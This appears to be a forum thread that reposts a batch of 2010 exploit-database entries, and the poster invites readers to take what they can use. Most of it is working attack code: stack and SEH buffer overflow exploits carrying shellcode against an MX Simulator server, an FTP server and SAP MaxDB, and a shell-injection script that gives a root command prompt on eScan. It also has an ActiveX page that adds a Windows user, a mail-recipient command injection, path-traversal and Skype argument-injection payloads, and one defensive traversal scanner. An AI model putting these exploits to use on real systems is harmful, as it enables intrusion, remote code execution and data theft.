this poc executes the calc.exe software on the remote
system.

The bug was discovered by luigi auriemma (www.aluigi.org)



copyright 2010 salvatore fresta aka drosophila

http://www.salvatorefresta.net/?opt=adv

http://www.salvatorefresta.net/files...2010-02-06.zip



this program is free software; you can redistribute it and/or

modify it under the terms of the gnu general public license

as published by the free software foundation; either version

2 of the license, or (at your option) any later version.



This program is distributed in the hope that it will be

useful, but without any warranty; without even the implied

warranty of merchantability or fitness for a particular

purpose. See the gnu general public license for more details.



You should have received a copy of the gnu general public

license along with this program; if not, write to the free

software foundation,inc., 59 temple place, suite 330, boston,

ma 02111-1307 usa



http://www.gnu.org/licenses/gpl-2.0.txt



*/



#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif

#define BUFFSZ 1024
#define PORT 19800

/*
 * windows/exec - 511 bytes
 * http://www.metasploit.com
 * Encoder: x86/alpha_mixed
 * EXITFUNC=process, CMD=calc.exe
 */
#define SHELLCODE \
"\xb8\x9e\xef\xf3\x90\x31\xc9\xb1\x33\xd9\xc2\xd9\x74\x24\xf4" \
"\x5b\x31\x43\x0e\x83\xc3\x04\x03\xdd\xe5\x11\x65\x1d\x11\x5c" \
"\x86\xdd\xe2\x3f\x0e\x38\xd3\x6d\x74\x49\x46\xa2\xfe\x1f\x6b" \
"\x49\x52\x8b\xf8\x3f\x7b\xbc\x49\xf5\x5d\xf3\x4a\x3b\x62\x5f" \
"\x88\x5d\x1e\x9d\xdd\xbd\x1f\x6e\x10\xbf\x58\x92\xdb\xed\x31" \
"\xd9\x4e\x02\x35\x9f\x52\x23\x99\x94\xeb\x5b\x9c\x6a\x9f\xd1" \
"\x9f\xba\x30\x6d\xd7\x22\x3a\x29\xc8\x53\xef\x29\x34\x1a\x84" \
"\x9a\xce\x9d\x4c\xd3\x2f\xac\xb0\xb8\x11\x01\x3d\xc0\x56\xa5" \
"\xde\xb7\xac\xd6\x63\xc0\x76\xa5\xbf\x45\x6b\x0d\x4b\xfd\x4f" \
"\xac\x98\x98\x04\xa2\x55\xee\x43\xa6\x68\x23\xf8\xd2\xe1\xc2" \
"\x2f\x53\xb1\xe0\xeb\x38\x61\x88\xaa\xe4\xc4\xb5\xad\x40\xb8" \
"\x13\xa5\x62\xad\x22\xe4\xe8\x30\xa6\x92\x55\x32\xb8\x9c\xf5" \
"\x5b\x89\x17\x9a\x1c\x16\xf2\xdf\xd3\x5c\x5f\x49\x7c\x39\x35" \
"\xc8\xe1\xba\xe3\x0e\x1c\x39\x06\xee\xdb\x21\x63\xeb\xa0\xe5" \
"\x9f\x81\xb9\x83\x9f\x36\xb9\x81\xc3\xd9\x29\x49\x2a\x7c\xca" \
"\xe8\x32"



int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
unsigned int resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {

    struct sockaddr_in peer;
    int     sd,
            len;
    unsigned short port = PORT;
    unsigned char buff[BUFFSZ],
            *host = NULL,
            pkg[] =
                "\x03"
                "\x00\x00\x00\x00"          // slot
                "\x00\x00\x00\x00"          // session id
                "\x00\x00\x00\x00"          // admin pwd crc
                "\x00\x00\x00\x00"          // uid
                "000000000000000000000000"  // ???
                "yz250f||||\n"              // bike's model
                "999\n"                     // bike's number
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"  // padding
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "a"
                "\xd8\x69\x83\x7c"          // eip - call esp (ffd4)
                SHELLCODE;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc < 2) {
        printf("\nmx simulator server 2010-02-06 remote buffer overflow poc - salvatore fresta\n"
               "http://www.salvatorefresta.net\n"
               "\n"
               "usage: %s <target host> <port> (default: %hu)\n"
               "\n", argv[0], port);
        return -1;
    }

    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("\n[*] socket opening in progress...");

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) {
        printf("\n[-] unable to open a socket!\n\n");
        std_err();
    }

    printf("\n[+] socket open successfully"
           "\n[*] data sending in progress...");

    memset(buff, 0, 9);
    len = send_recv(sd, buff, 9, buff, BUFFSZ, &peer, 1);

    *(int *)(pkg + 1) = *(int *)(buff + 1);
    *(int *)(pkg + 5) = *(int *)(buff + 5);
    len = send_recv(sd, pkg, sizeof(pkg) - 1, buff, BUFFSZ, &peer, 0);

    printf("\n[+] data sent successfully"
           "\n[+] connection closed\n\n");

    close(sd);

    return 0;
}







int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err) {

    int     retry,
            len;

    if(in && !out) {
        fputc('.', stdout);
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);
    }

    if(in) {
        for(retry = 2; retry; retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nerror: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0 && err) std_err();

    return len;
}

int timeout(int sock, int secs) {

    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);

    return 0;
}

unsigned int resolv(char *host) {

    struct  hostent *hp = NULL;
    unsigned int    host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nerror: unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(unsigned int *)hp->h_addr;
    }

    return host_ip;
}

#ifndef WIN32
void std_err(void) {
    perror("\nerror");
    exit(1);
}
#endif


# title: Uhttp server path traversal vulnerability
# edb-id: 11856
# cve-id: ()
# osvdb-id: ()
# author: Salvatore fresta
# published: 2010-03-23
# verified: Yes
# download exploit code
# download vulnerable app

uHTTP Server Path Traversal Vulnerability

Name: uHTTP Server
Vendor: http://uhttps.sourceforge.net
Versions affected: 0.1.0-alpha

Author: Salvatore Fresta aka Drosophila
Website: http://www.salvatorefresta.net
Contact: salvatorefresta [at] gmail [dot] com
Date: 2010-03-10



X. Index

I. About the application
II. Description
III. Analysis
IV. Sample code
V. Fix
VI. Disclosure timeline





I. About the application

An ultra lightweight web server with a very small memory
usage.





II. Description

Bad chars are not properly sanitised.





III. Analysis

Summary:

A) Path traversal

A) Path traversal

The problem is in the management of the bad chars that can
be used to launch some attacks, such as the directory
traversal.
The path traversal sequence ('../') is not checked, so it
can be used for seeking the directories of the affected
system.





IV. Sample code

The following is a simple example:

GET /../../../../../../etc/passwd HTTP/1.1

In this example, the daemon has been started in the following
path: /home/drosophila/downloads/uhttps/src





V. Fix

No patch.





VI. Disclosure timeline



2010-03-10 bug discovered

2009-03-10 advisory release
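Added here as an example (not from any advisory or exploit on this page): a Python path canonicaliser and log scanner for the traversal forms shown in the Argosoft (CWD ...) and uhttp (GET /../../etc/passwd) entries above. The function names, the log line format and the sample lines are assumptions constructed for the example.

```python
import posixpath
import re

# Added example, not code from any exploit or advisory on this page.
# Two things a defender wants for the path-traversal bugs listed here (the
# Argosoft "CWD ..." transcript and the uhttp "GET /../../etc/passwd" request):
#   1. a canonicaliser that decides whether a client-supplied path may leave the
#      server root, treating '\' as a separator like Windows-hosted servers do;
#   2. a scanner that flags the same patterns in FTP/HTTP command logs.
# Function names, the log line format and SAMPLE_LOG are constructed for this
# example. The checks are lexical only: symlinks below the root are a separate
# concern and need os.path.realpath on the resolved result.

ALL_DOTS = re.compile(r"^\.{2,}$")   # '..', '...', '....': never a real directory name


def normalize_request_path(requested):
    """Return (canonical_path, escaped).

    canonical_path is an absolute POSIX-style path where '/' is the server root.
    escaped is True if the path tried to climb above the root at any point, or
    used an all-dot segment such as '...' that the server should refuse rather
    than guess at (the Argosoft server above accepts it as a directory name).
    """
    unified = requested.replace("\\", "/")   # fold Windows separators
    parts = []
    escaped = False
    for seg in unified.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escaped = True       # '..' with nothing left to pop: above root
            continue
        if ALL_DOTS.match(seg):
            escaped = True
            continue
        parts.append(seg)
    return "/" + "/".join(parts), escaped


def resolve_under_root(root, requested):
    """Map a client path onto the filesystem under root; None if it is rejected."""
    canonical, escaped = normalize_request_path(requested)
    if escaped:
        return None
    root_norm = posixpath.normpath(root)
    resolved = posixpath.normpath(posixpath.join(root_norm, canonical.lstrip("/")))
    # Belt and braces: the joined result must still sit inside the root.
    if resolved != root_norm and not resolved.startswith(root_norm.rstrip("/") + "/"):
        return None
    return resolved


# FTP and HTTP verbs whose first argument is a path.
PATH_COMMANDS = {"CWD", "XCWD", "RETR", "STOR", "DELE", "RMD", "MKD",
                 "GET", "POST", "HEAD"}

# Constructed sample lines in the form "<client> <verb> <argument...>".
SAMPLE_LOG = [
    "10.0.0.5 CWD ..\\..\\..\\..\\..\\..\\..\\..\\",
    "10.0.0.5 RETR boot.ini",
    "10.0.0.9 GET /../../../../../../etc/passwd HTTP/1.1",
    "10.0.0.7 CWD ...",
    "10.0.0.3 GET /index.html HTTP/1.1",
    "10.0.0.3 CWD docs/../docs",
]


def scan_command_log(lines):
    """Return (client, line) for every command whose path would escape the root."""
    hits = []
    for line in lines:
        fields = line.split(None, 2)
        if len(fields) < 3:
            continue
        client, verb, rest = fields
        if verb.upper() not in PATH_COMMANDS:
            continue
        arg = rest.split()[0] if rest.split() else ""   # drop "HTTP/1.1" etc.
        _, escaped = normalize_request_path(arg)
        if escaped:
            hits.append((client, line))
    return hits
```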


# title: Sap gui version 7.00 bexglobal active-x unsecure method
# edb-id: 11879
# cve-id: ()
# osvdb-id: ()
# author: Alexey sintsov
# published: 2010-03-25
# verified: Yes
# download exploit code
# download n/a

Security vulnerability found in SAP GUI 7.10 and BI 7.0 that allows operating system functions to be called remotely.

Application: SAP GUI
Versions affected: SAP GUI (SAP GUI 7.1)
Vendor URL: http://sap.com
Bugs: Insecure method. Code execution.
Exploits: Yes
Reported: 16.10.2009
Vendor response: 27.10.2009
Date of public advisory: 23.03.2010
Author: Alexey Sintsov from DSecRG



description

***********



An insecure method was found in the SAPBExCommonResources (class BExGlobal) ActiveX control component, which is a part of SAP GUI.
One of the methods (Execute) can be used to execute files on the user's system.







Details

*******



An attacker can construct an HTML page which calls the vulnerable function "Execute" from the ActiveX object BExGlobal.







Example (add user 'don_huan' with password 'p4ssw0rd'):

*******





<html>

<title>*dsecrg* add user *dsecrg*</title>

<object classid="clsid:a009c90d-814b-11d3-ba3e-080009d22344" id='dh'></object>



<script language='javascript'>

function init()

{

dh.execute("net.exe","user don_huan p4ssw0rd /add","d:\\windows\\",1,"",1);



}

init();

</script>

dsecrg

</html>







fix information

***************

all patches are available since december via note 1407285





references

**********



http://dsecrg.com/pages/vul/show.php?id=164

https://service.sap.com/sap/support/notes/1407285.









About

*****



digital security is leading it security company in russia, providing information security consulting, audit and penetration testing services, risk analysis and isms-related services and certification for iso/iec 27001:2005 and pci dss standards. Digital security research group focuses on ************ application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our ************site.

# title: eDisplay Personal FTP Server 1.0.0 multiple post-authentication stack BoF
# edb-id: 11877
# cve-id: ()
# osvdb-id: ()
# author: Sud0
# published: 2010-03-25
# verified: Yes
# download exploit code
# download vulnerable app

# exploit title : eDisplay Personal FTP Server 1.0.0 multiple post-authentication stack BoF
# type of sploit: Remote code execution
# bug found by : loneferret (March 19, 2010)
# reference : http://www.exploit-db.com/exploits/11810
# exploit date : March 24, 2010
# author : Sud0
# version : 1.0.0
# os : Windows
# tested on : XP SP3 EN (VirtualBox)
# type of vuln : SEH
# greetz to : corelanc0d3r and of course my friends and .... First of all my wife for supporting me and my obsession
# change ip and ftp account according to your server

#!/usr/bin/env python2
import socket

junk = "b" * 37  # SEH overwritten after 37 bytes
nseh = "\x74\x20\x74\x20"  # jmp forward (used a JE to avoid bad chars)
seh = "\x69\x40\x2b\x20"  # pop/pop/ret

# shellcode for calc.exe encoded with alpha2, basereg = eax.
# The decoder stub (PYIIII...) is alpha2's uppercase variant, which emits only
# uppercase alphanumerics, so the string is restored to uppercase here; the
# forum copy of this post had lowercased it, which breaks the decoder.
shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJILKJLV5LKJL3XQ0WPQ0FOCXU33Q2LSSLMPEZXV0NX9WMCIRSGKO8PA"

# shellcode to align eax for the decoder
align = "\x5a\x5a\x5a\x52\x58\x2d\x3b\x55\x55\x55\x2d\x3b\x55\x55\x55\x2d\x3b\x55\x55\x55"

buffer = junk + nseh + seh + "c" * 26 + align + "c" * 25 + shellcode + "a" * 50

print "sending exploit .... \r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))
s.recv(1024)
s.send('USER fox\r\n')
s.recv(1024)
s.send('PASS mulder\r\n')
s.recv(1024)
s.send('RMD ' + buffer + '\r\n')
s.close()



# title: SAP MaxDB malformed handshake request remote code execution
# edb-id: 11886
# cve-id: ()
# osvdb-id: ()
# author: S2 Crew
# published: 2010-03-26
# verified: Yes
# download exploit code
# download n/a

#!/usr/bin/python

# exploit title: SAP MaxDB malformed handshake request remote code execution
# date: 2010.03.26
# author: S2 Crew [Hungary]
# software link: http://sap.com
# version: 7.7.06.09
# tested on: Windows XP SP2 EN
# cve: ZDI-10-032
# code:
#############################################################
# Trying 172.16.29.133...
# Connected to 172.16.29.133.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\sdb\data\wrk>
#############################################################

import socket
import sys
import os

# payload shellcode (the telnet transcript above shows the shell obtained)
sc = (
"\x31\xc9\xda\xda\xbe\x94\x3f\xbe\xea\xb1\x56\xd9\x74\x24\xf4"
"\x5f\x31\x77\x17\x03\x77\x17\x83\xef\xfc\x76\xca\x42\x02\xff"
"\x35\xbb\xd3\x9f\xbc\x5e\xe2\x8d\xdb\x2b\x57\x01\xaf\x7e\x54"
"\xea\xfd\x6a\xef\x9e\x29\x9c\x58\x14\x0c\x93\x59\x99\x90\x7f"
"\x99\xb8\x6c\x82\xce\x1a\x4c\x4d\x03\x5b\x89\xb0\xec\x09\x42"
"\xbe\x5f\xbd\xe7\x82\x63\xbc\x27\x89\xdc\xc6\x42\x4e\xa8\x7c"
"\x4c\x9f\x01\x0b\x06\x07\x29\x53\xb7\x36\xfe\x80\x8b\x71\x8b"
"\x72\x7f\x80\x5d\x4b\x80\xb2\xa1\x07\xbf\x7a\x2c\x56\x87\xbd"
"\xcf\x2d\xf3\xbd\x72\x35\xc0\xbc\xa8\xb0\xd5\x67\x3a\x62\x3e"
"\x99\xef\xf4\xb5\x95\x44\x73\x91\xb9\x5b\x50\xa9\xc6\xd0\x57"
"\x7e\x4f\xa2\x73\x5a\x0b\x70\x1a\xfb\xf1\xd7\x23\x1b\x5d\x87"
"\x81\x57\x4c\xdc\xb3\x35\x19\x11\x89\xc5\xd9\x3d\x9a\xb6\xeb"
"\xe2\x30\x51\x40\x6a\x9e\xa6\xa7\x41\x66\x38\x56\x6a\x96\x10"
"\x9d\x3e\xc6\x0a\x34\x3f\x8d\xca\xb9\xea\x01\x9b\x15\x45\xe1"
"\x4b\xd6\x35\x89\x81\xd9\x6a\xa9\xa9\x33\x1d\xee\x67\x67\x4d"
"\x98\x85\x97\x63\x04\x03\x71\xe9\xa4\x45\x29\x86\x06\xb2\xe2"
"\x31\x79\x90\x5e\xe9\xed\xac\x88\x2d\x12\x2d\x9f\x1d\xbf\x85"
"\x48\xd6\xd3\x11\x68\xe9\xfe\x31\xe3\xd1\x68\xcb\x9d\x90\x09"
"\xcc\xb7\x43\xaa\x5f\x5c\x94\xa5\x43\xcb\xc3\xe2\xb2\x02\x81"
"\x1e\xec\xbc\xb4\xe3\x68\x86\x7d\x3f\x49\x09\x7f\xb2\xf5\x2d"
"\x6f\x0a\xf5\x69\xdb\xc2\xa0\x27\xb5\xa4\x1a\x86\x6f\x7e\xf0"
"\x40\xf8\x07\x3a\x53\x7e\x08\x17\x25\x9e\xb8\xce\x70\xa0\x74"
"\x87\x74\xd9\x69\x37\x7a\x30\x2a\x47\x31\x19\x1a\xc0\x9c\xcb"
"\x1f\x8d\x1e\x26\x63\xa8\x9c\xc3\x1b\x4f\xbc\xa1\x1e\x0b\x7a"
"\x59\x52\x04\xef\x5d\xc1\x25\x3a\x57")

# egghunter (int 2e syscall variant): walks memory page by page looking for the
# 4-byte tag "T00W" (mov eax, 0x57303054) twice in a row, then jumps to it
egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

host = "172.16.29.133"
port = 7210

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

ret = "\x08\xf1\xa0\x00"  # hc

# The egg is written as "T00WT00W": it has to match the tag the hunter
# compares against byte for byte (the forum copy of this post had lowercased it)
packet = (
"\x63\x00\x00\x00\x03\x2f\x00\x00\x01\x00\x00\x00"
"\xff\xff\xff\xff\x00\x00\x04\x00\x63\x00\x00\x00"
"\x00\x02\x4b\x00\x04\x09\x00\x00\x44\x20\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff"
"\x6d\x61" + ret + "\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x07\x49" + "a" * 5000 + "T00WT00W" + sc + "\x41" * 2500 + egghunter + "\x90" * 2500)

s.send(packet)
s.close()


Miscellaneous vulnerabilities, all from 2010. If you find something you can use, take it; if not, no criticism please. Best regards.
#3
xp-10
Reply: Miscellaneous vulnerabilities. Posted 22-Apr-2010, 01:21 AM by WEB


# title: IE/Opera source code viewer null character handling
# edb-id: 12156
# cve-id: ()
# osvdb-id: ()
# author: Daniel Correa
# published: 2010-04-11
# verified: Yes
# download exploit code
# download n/a

# exploit title: IE/Opera source code viewer null character handling vulnerability
# date: 10/04/2010
# author: Daniel Correa
# software link:
http://www.microsoft.com/windows/int...r/default.aspx
# software link: http://www.opera.com/download/
# version: Tested on IE 8, Opera 10.51
# tested on: Windows XP; Windows 7 + default IE 8
# cve :

# description :
The vulnerability in the source code viewer in both browsers (IE &
Opera) is in how they process the null control character (0x00):
including this character in the transmitted message results in a
misunderstanding that is reflected in the concealment of the transmitted
message; only the code that is between valid tags is shown. In other
words, by exploiting this vulnerability we can completely hide the source
code from the user of the Internet Explorer and Opera browsers.



# code:
The next code hides all the source code from the source code viewer.
<?php
echo "\x00";
?>
this is a hidden message
this is another one
...
as we can see we can hide any message
<html>
<head>
<title>titulo</title>
</head>
<body>
<h1>hello world</h1>
</body>
</html>

And the next only hides part of the code (the script part):
<html>
<head>
<title>titulo</title>
</head>
<body>
<h1>hello world</h1>
</body>
</html>
<?php
echo chr(0);
?>
<script>alert('this code is never seen');</script>







The package contains three proofs of concept:

http://www.sinfocol.org/archivos/201...opera_null.zip



--

sinfocol

http://www.sinfocol.org






The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful.


# title: Apache SpamAssassin Milter plugin remote root command execution
# edb-id: 11662
# cve-id: ()
# osvdb-id: ()
# author: Kingcope
# published: 2010-03-09
# verified: Yes
# download exploit code
# download n/a

Description: The SpamAssassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
Author: Kingcope

SpamAssassin Milter plugin remote root zeroday (btw zerodays lurk in the
shadows not here)
aka the postfix_joker advisory

logic fuckup?

March 07 2010 // if you read this 10 years later you are definitely
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ keep it ultra priv8 +++

Software
+-+-+-+-+
Apache SpamAssassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
Research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

SpamAssassin Milter
A little plugin for the Sendmail Milter (mail filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through SpamAssassin, a highly customizable spamfilter.

Remote code execution vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The SpamAssassin Milter plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).



From spamass-milter-0.3.1 (-latest) line 820:

//
// Gets called once for each recipient
//
// Stores the first recipient in the SpamAssassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
    struct context *sctx = (struct context*)smfi_getpriv(ctx);
    SpamAssassin* assassin = sctx->assassin;
    FILE *p;
#if defined(__FreeBSD__)
    int rv;
#endif

    debug(D_FUNC, "mlfi_envrcpt: enter");

    if (flag_expand)
    {
        /* open a pipe to sendmail so we can do address
           expansion */

        char buf[1024];
        char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
        snprintf(buf, sizeof(buf)-1, fmt, sendmail, envrcpt[0]);
#else
        /* XXX possible buffer overflow here // is this a joke ?! */
        sprintf(buf, fmt, sendmail, envrcpt[0]);
#endif

        debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
        rv = pthread_mutex_lock(&popen_mutex);
        if (rv)
        {
            debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
            abort();
        }
#endif

        /* envrcpt[0] is the unsanitised RCPT TO value, interpolated into a
           command line that is handed to the shell */
        p = popen(buf, "r");                                    [1]
        if (!p)
        {
            debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
            assassin->expandedrcpt.push_back(envrcpt[0]);


[1] the vulnerable popen() call.



Remote root exploit PoC through Postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
MAIL FROM: me@me.com
250 2.1.0 Ok
RCPT TO: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo



signed,



kingcope

# title: MicroWorld eScan Antivirus < 3.x remote root command execution
# edb-id: 11720
# cve-id: ()
# osvdb-id: ()
# author: Mohammed Almutairi
# published: 2010-03-13
# verified: No
# download exploit code
# download n/a

#!/usr/bin/env python
import sys
from socket import *

# author: Mohammed Almutairi
# (sa.attacker@gmail.com)
"""
MicroWorld eScan Antivirus < 3.x remote root command execution
package mwadmin package vulnerabilities (Linux)
the base packages (mwadmin and mwav) must be installed before eScan
link:
http://www.escanav.com/english/conte...x_products.asp
infected: all version 3.x eScan Linux
1-eScan for Linux desktop
2-eScan for Linux file servers
3-MailScan for Linux and WebScan
tested on RedHat and Fedora
ultra priv8

description:

From /opt/microworld/var/www/htdocs/forgotpassword.php:
include("common_functions.php"); <---> (1)

if ($_POST['forgot'] == "send password")
{
$user = $_POST["uname"]; <--->(2) insecure:(


vulnerable code in forgotpassword.php and common_functions.php
in (1) $runasroot = "/opt/microworld/sbin/runasroot";
we can inject through the file forgotpassword.php as you can see in (2)
with remote root command execution
>> escan.py www.***.com
escan@/bin/sh:$sa$ => reboot
[*] done! Sent to: www.***.com
"""


def xpl():
    if len(sys.argv) < 2:
        print "[*] MicroWorld eScan Antivirus remote root command execution"
        print "[*] exploited by Mohammed Almutairi"
        print "[*] usage: %s host" % sys.argv[0]
        return

    host = sys.argv[1]
    port = 10080  # default port
    cmd = raw_input("escan@/bin/sh:$sa$ => ")
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect((host, port))
    sh = "/opt/microworld/sbin/runasroot /bin/sh -c '%s'" % cmd

    # the uname field is used unescaped in a shell command, so ';cmd;' breaks out of it: see (2) above
    sa = "uname=;%s;" % sh
    sa += "&forgot=send+password"

    s = "POST /forgotpassword.php HTTP/1.1\r\n"
    s += "Host: %s:%d\r\n" % (host, port)
    s += "User-Agent: */*\r\n"
    s += "Accept: ar,en-us;q=0.7,en;q=0.3\r\n"
    s += "Content-Type: application/x-www-form-urlencoded\r\n"
    s += "Content-Length: %d \r\n\r\n" % len(sa)
    s += sa

    sock.sendall(s)
    print "[*] done! Sent to: %s" % host
    sock.close()


if __name__ == "__main__":
    xpl()
    sys.exit(0)


# title: Skype - URI handler input validation
# edb-id: 11694
# cve-id: ()
# osvdb-id: ()
# author: Paul Craig
# published: 2010-03-11
# verified: Yes
# download exploit code
# download n/a

Description

The Windows Skype client implements two URI handlers, skype: and skype-plugin:. Both handlers allow for easy browser integration and are supported by all modern browsers. When a Skype link is clicked, the skype.exe process is spawned with the /uri: command argument, followed by the user specified phone number or contact name.
For example, clicking the link skype:paulcraig will spawn the process skype.exe "/uri:skype:paulcraig".

Due to a flaw in the current user input validation performed by Skype, it is possible to append additional command line arguments which are subsequently processed during the launch of skype.exe.
In 2006 colleague Brett Moore discovered a similar vulnerability in Skype which led to certain security restrictions being enforced when using the skype: URI handler. Brett's exploit at the time involved including additional command line arguments to the skype.exe process which would send a file to a remote user when a Skype link was clicked. Changes were made to Skype to remove available command line arguments when the /uri argument is present.
Although many of the useful arguments have been disallowed (such as sending a file to a remote user),
Security-Assessment.com found that the /datapath argument can be included and directed to a remote SMB share directly through the Skype URI handler. The datapath argument specifies where the Skype configuration files and security policy are kept. Specifying a datapath argument will override any local security policy defined in the Windows registry.
A remote user is capable of crafting a link that, when clicked, will spawn skype.exe on a client using a datapath location which is present on a remote SMB share. The Skype client will load any configuration or security policy present and save the user's Skype account information to the remote share.
This allows a remote user to control the Skype configuration and security policy of the local client instance of Skype. Settings such as a remote proxy can be defined, which could be used to man in the middle Skype communications.

Security-Assessment.com also found that the contents of another user's datapath contained a wealth of private information and call history associated with the user.

Exploitation

Exploitation occurs when the victim clicks a malformed Skype link in Internet Explorer (6, 7 or 8) or Chrome. The exploit originates from a failure to sanitise raw binary content correctly, and the ability of ShellExecute() to permit URIs which contain raw binary values.
Security-Assessment.com found that the skype: URI handler permits the double quote and forward slash (" and /) characters within a Skype URI, but does not permit any whitespace characters (such as space, %20, +) to be included. This essentially protects Skype from a user inserting additional command line arguments directly within the skype: link, as a command line argument separator character (whitespace) cannot be included. However, the use of a raw binary byte is permitted by Skype and the byte is subsequently treated as a whitespace value when parsing skype.exe command line arguments. This provides a whitespace character without being a traditional whitespace. This method of whitespace character injection can be used to include additional command line arguments to the skype.exe process.

The example below illustrates this.

<a href=skype:a"0x01/secondary0x01/datapath:"\\remotehost\share\exploit>click me</a>

where 0x01 represents the raw binary byte value 0x01.

This URL will result in the Skype configuration being retrieved from the remote host 'remotehost'. Once a user has authenticated using Skype, the Skype client will download their chat history and call logs to the remote share.
Other arguments such as /username and /password can also be included using the same method of whitespace injection. This is illustrated below.

<a href=skype:a"0x01/secondary0x01/username:"test"0x01/password:"test>click me</a>

The bytes 0x01-0x07 were found to function as a replacement for a whitespace character.

Recommendations

Skype have created a fix for this vulnerability which has been included as part of Skype v4.2 hotfix #1.
Security-Assessment.com recommends all users of Skype upgrade to the latest version as soon as possible.

For more information on the new release of Skype please refer to the release notes:
http://share.skype.com/sites/garage/..._4.2.0.155.pdf

About Security-Assessment.com

Security-Assessment.com is Australasia's leading team of information security consultants specialising in providing high quality information security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognized companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendors' products. Members of the Security-Assessment.com R&D team are globally recognized through their release of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, contact us:

Web: www.security-assessment.com
Email: info@security-assessment.com

# title: Microsoft Internet Explorer iepeers.dll use-after-free exploit (meta)
# edb-id: 11683
# cve-id: ()
# osvdb-id: ()
# author: Trancer
# published: 2010-03-10
# verified: Yes
# download exploit code
# download n/a

